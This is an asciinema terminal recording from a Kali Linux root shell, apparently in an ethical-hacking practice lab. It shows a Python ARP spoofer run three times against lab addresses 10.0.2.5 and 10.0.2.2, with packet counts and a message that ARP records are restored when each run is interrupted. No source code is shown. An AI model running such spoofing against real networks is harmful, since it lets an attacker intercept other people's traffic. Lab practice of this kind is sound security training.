{"version": 2, "width": 183, "height": 13, "timestamp": 1754404714, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.034281, "o", "                                                                                                                                                                                       \r\r\u001b]0;root@kali: /home/oliverpotter/Documents/EthicalHacking-Python/arp_spoofer\u0007"]
[0.045304, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot㉿kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/oliverpotter/Documents/EthicalHacking-Python/arp_spoofer\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[0.045359, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[1.915506, "o", "python3 arp_spoofer.py -v 10.0.2.5 -g 10.0.2.2"]
[1.917903, "o", "\u001b[46D\u001b[36mp\u001b[36my\u001b[36mt\u001b[36mh\u001b[36mo\u001b[36mn\u001b[36m3\u001b[39m \u001b[1ma\u001b[1mr\u001b[1mp\u001b[1m_\u001b[1ms\u001b[1mp\u001b[1mo\u001b[1mo\u001b[1mf\u001b[1me\u001b[1mr\u001b[1m.\u001b[1mp\u001b[1my\u001b[0m \u001b[32m-\u001b[32mv\u001b[39m\u001b[10C\u001b[32m-\u001b[32mg\u001b[39m\u001b[9C"]
[2.933477, "o", "\u001b[?1l\u001b>"]
[2.933641, "o", "\u001b[?2004l"]
[2.935422, "o", "\r\r\n"]
[3.389845, "o", "\r/+/ Total Packets Sent: 2"]
[5.574078, "o", "\r/+/ Total Packets Sent: 4"]
[7.753933, "o", "\r/+/ Total Packets Sent: 6"]
[9.913854, "o", "\r/+/ Total Packets Sent: 8"]
[10.544842, "o", "^C"]
[10.544894, "o", "\r\n/!/ Quitting ARP Spoofer.\r\n/-/ Restoring ARP Records.\r\n"]
[10.915454, "o", "                                                                                                                                                                                       \r\r\u001b]0;root@kali: /home/oliverpotter/Documents/EthicalHacking-Python/arp_spoofer\u0007\r\n"]
[10.922872, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot㉿kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/oliverpotter/Documents/EthicalHacking-Python/arp_spoofer\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[10.923018, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[13.435422, "o", "python3 arp_spoofer.py -g 10.0.2.2"]
[13.437561, "o", "\u001b[34D\u001b[36mp\u001b[36my\u001b[36mt\u001b[36mh\u001b[36mo\u001b[36mn\u001b[36m3\u001b[39m \u001b[1ma\u001b[1mr\u001b[1mp\u001b[1m_\u001b[1ms\u001b[1mp\u001b[1mo\u001b[1mo\u001b[1mf\u001b[1me\u001b[1mr\u001b[1m.\u001b[1mp\u001b[1my\u001b[0m \u001b[32m-\u001b[32mg\u001b[39m\u001b[9C"]
[14.808021, "o", "\u001b[?1l\u001b>"]
[14.80816, "o", "\u001b[?2004l"]
[14.809566, "o", "\r\r\n"]
[15.087642, "o", "/-/ Enter IP address of target machine > "]
[17.036312, "o", "1"]
[17.356158, "o", "0"]
[17.70753, "o", "."]
[18.165705, "o", "0"]
[18.495223, "o", "."]
[19.141221, "o", "."]
[20.021191, "o", "\b \b"]
[20.439142, "o", "2"]
[20.646284, "o", "."]
[21.083238, "o", "5"]
[21.581847, "o", "\r\n"]
[21.762019, "o", "\r/+/ Total Packets Sent: 2"]
[23.945544, "o", "\r/+/ Total Packets Sent: 4"]
[26.10999, "o", "\r/+/ Total Packets Sent: 6"]
[28.259452, "o", "^C"]
[28.277611, "o", "\r\n/!/ Quitting ARP Spoofer.\r\n/-/ Restoring ARP Records.\r\n"]
[28.628661, "o", "                                                                                                                                                                                       \r\r\u001b]0;root@kali: /home/oliverpotter/Documents/EthicalHacking-Python/arp_spoofer\u0007"]
[28.628703, "o", "\r\n"]
[28.63611, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot㉿kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/oliverpotter/Documents/EthicalHacking-Python/arp_spoofer\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[28.636436, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[29.456609, "o", "python3 arp_spoofer.py -g 10.0.2.2"]
[29.458375, "o", "\u001b[34D\u001b[36mp\u001b[36my\u001b[36mt\u001b[36mh\u001b[36mo\u001b[36mn\u001b[36m3\u001b[39m \u001b[1ma\u001b[1mr\u001b[1mp\u001b[1m_\u001b[1ms\u001b[1mp\u001b[1mo\u001b[1mo\u001b[1mf\u001b[1me\u001b[1mr\u001b[1m.\u001b[1mp\u001b[1my\u001b[0m \u001b[32m-\u001b[32mg\u001b[39m\u001b[9C"]
[30.217999, "o", "\b \b"]
[30.219855, "o", "\u001b[38;2;153;153;153m2\u001b[39m\b"]
[30.36889, "o", "\b \u001b[39m \b\b"]
[30.370828, "o", "\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\b\b"]
[30.498132, "o", "\b \u001b[39m \u001b[39m \b\b\b"]
[30.499933, "o", "\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\b\b\b"]
[30.635713, "o", "\b \u001b[39m \u001b[39m \u001b[39m \b\b\b\b"]
[30.637644, "o", "\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\b\b\b\b"]
[30.770312, "o", "\b \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b"]
[30.772308, "o", "\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\b\b\b\b\b"]
[30.919945, "o", "\b \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b"]
[30.922087, "o", "\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\b\b\b\b\b\b"]
[31.04386, "o", "\b \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b\b"]
[31.045745, "o", "\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\b\b\b\b\b\b\b"]
[31.18566, "o", "\b \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[8D"]
[31.187674, "o", "\u001b[38;2;153;153;153m1\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[8D"]
[31.33351, "o", "\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[9D"]
[31.33508, "o", "\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[9D"]
[31.46492, "o", "\b\b\u001b[32m-\u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[10D"]
[31.46661, "o", "\u001b[38;2;153;153;153mg\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[10D"]
[31.61131, "o", "\b\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[11D"]
[31.612947, "o", "\u001b[38;2;153;153;153m-\u001b[39m\u001b[38;2;153;153;153mg\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[11D"]
[31.785947, "o", "\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[12D"]
[31.787389, "o", "\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153m-\u001b[39m\u001b[38;2;153;153;153mg\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153m1\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m0\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[38;2;153;153;153m.\u001b[39m\u001b[38;2;153;153;153m2\u001b[39m\u001b[12D"]
[32.268185, "o", "\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[12D\u001b[?1l\u001b>"]
[32.268308, "o", "\u001b[?2004l"]
[32.269341, "o", "\r\r\n"]
[32.539015, "o", "/-/ Enter IP address of target machine > "]
[33.600246, "o", "1"]
[33.77419, "o", "0"]
[33.99188, "o", "."]
[34.202842, "o", "0"]
[34.400039, "o", "."]
[34.714149, "o", "2"]
[34.924868, "o", "."]
[35.159028, "o", "5"]
[35.362795, "o", "\r\n"]
[35.363066, "o", "/-/ Enter IP address of gateway to spoof > "]
[36.243163, "o", "1"]
[36.414406, "o", "0"]
[36.634116, "o", "."]
[37.319278, "o", "0"]
[37.598184, "o", "."]
[38.059191, "o", "2"]
[38.283234, "o", "."]
[38.499947, "o", "2"]
[38.810406, "o", "\r\n"]
[38.978066, "o", "\r/+/ Total Packets Sent: 2"]
[41.141981, "o", "\r/+/ Total Packets Sent: 4"]
[43.329862, "o", "\r/+/ Total Packets Sent: 6"]
[45.027252, "o", "^C"]
[45.027441, "o", "\r\n/!/ Quitting ARP Spoofer.\r\n/-/ Restoring ARP Records.\r\n"]
[45.373677, "o", "                                                                                                                                                                                       \r\r\u001b]0;root@kali: /home/oliverpotter/Documents/EthicalHacking-Python/arp_spoofer\u0007\r\n"]
[45.381252, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot㉿kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/oliverpotter/Documents/EthicalHacking-Python/arp_spoofer\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[47.230295, "o", "\u001b[?2004l\r\r\n"]
